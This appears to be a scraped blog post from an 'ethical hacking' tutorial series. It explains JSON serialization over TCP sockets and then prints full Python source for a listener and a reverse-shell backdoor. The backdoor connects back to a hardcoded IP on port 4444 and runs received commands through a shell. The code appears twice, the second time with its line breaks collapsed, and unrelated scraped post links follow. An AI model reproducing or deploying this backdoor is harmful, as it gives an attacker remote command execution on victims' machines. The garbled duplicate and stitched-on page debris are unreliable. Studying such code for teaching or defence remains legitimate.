BACKDOORS Sockets

Problem:

  • TCP is stream-based.
  • Difficult to identify the end of message/batch.

Solution:

  • Make sure the message is well defined.
  • Implement a protocol that sends and receives methods conform to.
    • Send the size of the message as a header.
    • Append an end-of-message mark to the end of each message.
    • Serialize the message.

BACKDOORS Serialization

Benefits:

  • Message is well defined, receiver knows if message is incomplete.
  • Can be used to transfer objects(lists, dicts ...etc)

Implementation:

  • JSON and Pickle are common solutions.
  • JSON(Javascript Object Notation) is implemented in many programming languages.
  • Represents objects as text.
  • Widely used when transferring data between clients and servers.

Server Side - Listener Code:

#!/usr/bin/env python

import socket

import json

class Listener:

    def __init__(self, ip, port):

        listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)

        listener.bind((ip, port))

        listener.listen(0)

        print("[+] Waiting for incoming connections")

        self.connection, address = listener.accept()

        print("[+] Got a connection from " + str(address))

    def reliable_send(self, data):

        json_data = json.dumps(data).encode()

        self.connection.send(json_data)

    def reliable_receive(self):

        json_data = ""

        while True:

            try:

                json_data = json_data + self.connection.recv(1024).decode()

                return json.loads(json_data)

            except ValueError:

                continue

    def execute_remotely(self, command):

        self.reliable_send(command.decode())

        return self.reliable_receive()

    def run(self):

        while True:

            command = input(">> ").encode()

            result = self.execute_remotely(command)

            print(result)

my_listener = Listener("10.0.0.43", 4444)

my_listener.run()

Client Side - Backdoor code:

#!/usr/bin/env python

import json

import socket

import subprocess

class Backdoor:

    def __init__(self, ip, port):

        self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        self.connection.connect((ip, port))

    def reliable_send(self, data):

        json_data = json.dumps(data).encode()

        self.connection.send(json_data)

    def reliable_receive(self):

        json_data = ""

        while True:

            try:

                json_data = json_data + self.connection.recv(1024).decode()

                return json.loads(json_data)

            except ValueError:

                continue

    def execute_system_command(self, command):

        return subprocess.check_output(command, shell=True)

    def run(self):

        while True:

            command = self.reliable_receive()

            command_result = self.execute_system_command(command)

            self.reliable_send(command_result.decode())

        connection.close()

my_backdoor = Backdoor("10.0.0.43", 4444)

my_backdoor.run()

Execute result:

#!/usr/bin/env pythonimport jsonimport socketimport subprocess

class Backdoor:    def __init__(self, ip, port):        self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)        self.connection.connect((ip, port))
    def reliable_send(self, data):        json_data = json.dumps(data).encode()        self.connection.send(json_data)
    def reliable_receive(self):        json_data = ""        while True:            try:                json_data = json_data + self.connection.recv(1024).decode()                return json.loads(json_data)            except ValueError:                continue
    def execute_system_command(self, command):        return subprocess.check_output(command, shell=True)
    def run(self):        while True:            command = self.reliable_receive()            command_result = self.execute_system_command(command)            self.reliable_send(command_result.decode())        connection.close()

my_backdoor = Backdoor("10.0.0.43", 4444)my_backdoor.run()

Python Ethical Hacking - BACKDOORS(3)的更多相关文章

  1. Python Ethical Hacking - BACKDOORS(8)

    Cross-platform hacking All programs we wrote are pure python programs They do not rely on OS-specifi ...

  2. Python Ethical Hacking - BACKDOORS(1)

    REVERSE_BACKDOOR Access file system. Execute system commands. Download files. Upload files. Persiste ...

  3. Python Ethical Hacking - BACKDOORS(7)

    Handling Errors: If the client or server crashes, the connection will be lost. Backdoor crashes if: ...

  4. Python Ethical Hacking - BACKDOORS(6)

    File Upload: A file is a series of characters. Uploading a file is the opposite of downloading a fil ...

  5. Python Ethical Hacking - BACKDOORS(5)

    File Download: A file is a series of characters. Therefore to transfer a file we need to: 1. Read th ...

  6. Python Ethical Hacking - BACKDOORS(4)

    REVERSE_BACKDOOR - cd command Access file system: cd command changes current working directory. It h ...

  7. Python Ethical Hacking - BACKDOORS(2)

    Refactoring - Creating a Listener Class #!/usr/bin/env python import socket class Listener: def __in ...

  8. Python Ethical Hacking - ARP Spoofing

    Typical Network ARP Spoofing Why ARP Spoofing is possible: 1. Clients accept responses even if they ...

  9. Python Ethical Hacking - NETWORK_SCANNER(2)

    DICTIONARIES Similar to lists but use key instead of an index. LISTS List of values/elements, all ca ...

随机推荐

  1. javaScript深入浅出之理解闭包

    javaScript深入浅出之理解闭包 引言 闭包是个老生长谈的话题了,对于闭包网上也有很多不同的看法 <你不知道的javaScript>对于闭包是这么定义的:函数创建和函数执行不在同一个 ...

  2. mysql定时备份任务

    简介 在生产环境上,为了避免数据的丢失,通常情况下都会定时的对数据库进行备份.而Linux的crontab指令则可以帮助我们实现对数据库定时进行备份.首先我们来简单了解crontab指令,如果你会了请 ...

  3. java基础-8种基本类型

    正文 java中的八种基础类型. boolean:只有两个值,false,true 带符号类型 byte:占用1个字节,一个字节也就是8位,那么由于是最高一位是用来表示 负还是正,所以范围就是 -2^ ...

  4. 暑假集训Day0

    啊这 跟学长学的要写日记 希望到时候能写省选集训的总结 咳咳 今天上午做了一上午苦力好像让老苏夸了难以接受(年纪两百考到年级两千他居然没有干我) 上午搞卫生搞到了十点半………… 替女生拉包提东西了!! ...

  5. 入门大数据---Spark_Streaming基本操作

    一.案例引入 这里先引入一个基本的案例来演示流的创建:获取指定端口上的数据并进行词频统计.项目依赖和代码实现如下: <dependency> <groupId>org.apac ...

  6. Redis高级特性

    redis的事务(transaction) 转载:https://blog.csdn.net/fmwind/article/details/78065236 redis中的事务是一组命令的集合.事务同 ...

  7. jQuery制作div板块拖动层排序

    html结构: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www ...

  8. STL初步学习(vector)

    前文 初三下学期进入新的学习,对于前两年的学习内容因为各种原因 上课打游戏,睡觉,看视频 已经遗忘,忘记如何使用,算是重新学习一次信息学,希望能尽快将以前的内容弥补上来,争取能在CSP-2020取得一 ...

  9. docker 运行镜像

    docker run -e "环境变量=值“ --nam 别名 -v /etc/localtime:/etc/localtime:ro [时区保持跟宿主机器一致]-d -p 21021:80 ...

  10. angular入门--filter搜索

    首先,列表绑定忽略 先上代码 <html ng-app="app1"> <head> <meta charset='utf-8' /> < ...